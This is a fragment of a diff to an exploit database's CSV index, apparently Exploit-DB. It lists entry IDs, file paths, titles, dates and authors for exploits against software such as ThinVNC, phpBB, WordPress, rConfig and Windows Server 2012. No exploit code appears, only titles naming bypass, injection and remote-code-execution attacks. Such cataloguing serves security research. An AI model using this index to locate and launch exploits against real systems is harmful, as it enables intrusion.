47519,exploits/windows/remote/47519.py,"ThinVNC 1.0b1 - Authentication Bypass",2019-10-17,"Nikhith Tumamlapalli",remote,windows,
|
||||
47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
|
||||
47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
|
||||
47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
|
||||
47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -41872,3 +41876,5 @@ id,file,description,date,author,type,platform,port
|
|||
47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,
|
||||
47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
|
||||
47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
|
||||
47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
|
||||
47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
|
||||
|
|